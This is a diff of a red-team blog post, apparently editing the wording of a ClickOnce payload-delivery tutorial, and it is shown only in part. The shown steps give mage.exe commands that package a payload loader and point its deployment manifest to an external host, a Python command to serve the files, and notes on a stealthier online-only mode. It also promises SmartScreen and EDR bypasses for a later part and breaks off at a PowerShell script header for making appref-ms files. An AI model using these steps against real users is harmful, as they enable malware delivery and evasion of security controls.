Back to all posts

 mage.exe -New Application -FromDirectory .\\payload\\ -Version 1.0.0.0

-1. Just turn -Install false for Online Only.[More Stealthy but appref-ms will not work as it requires -Install true "Always"]
+1. Just turn -Install false for online-only.
+(More stealthy, but appref-ms will not work since it requires -Install true always.)

 mage.exe -New Deployment -Processor MSIL -Install true -name "Clickonce-Test-POC" -Publisher "sample" -ProviderUrl "http://labs.pivotsec.in:8080/ClickOnceSample.application" -AppManifest .\\application.exe.manifest -ToFile ClickOnceSample.application"

-• Step 5: Host all the files in a webserver ,a simple python http server can be used for this.
+• Step 5: Host all the files on a web server.
+A simple Python HTTP server works.

 python -m http.server 8080 -d ./output/

-Now that we have a ClickOnceSample.application ready to be served ,let look at how the client/victim can deploy this
+Now that we have a ClickOnceSample.application ready to be served, let's look at how the client/victim can deploy this.

-OPSEC: In Step 2, we have created a simple loader which is unsigned.
-When it is called by our ClickOnce application, it will prompt user with SmartScreen and will trigger the EDR in place.
-Don't worry we are going to bypass both of them in Part-2 of this series.
+OPSEC: In Step 2, we created a simple loader which is unsigned.
+When called by our ClickOnce application, it will prompt the user with SmartScreen and trigger the EDR in place.
+We are going to bypass both of them in Part 2.
+Similar SmartScreen reputation issues are explored in our BYOR writeup.

-• Step 6: Create appref-ms (an UTF-16 LE encoded .lnk like) file that points out to Deployment Manifest.
+• Step 6: Create an appref-ms (a UTF-16 LE encoded .lnk-like file) that points to the deployment manifest.

-One can use the below powershell script to produce appref-ms of their choice.
+You can use the PowerShell script below to produce an appref-ms of your choice.

 ####### Create-appref_ms.ps1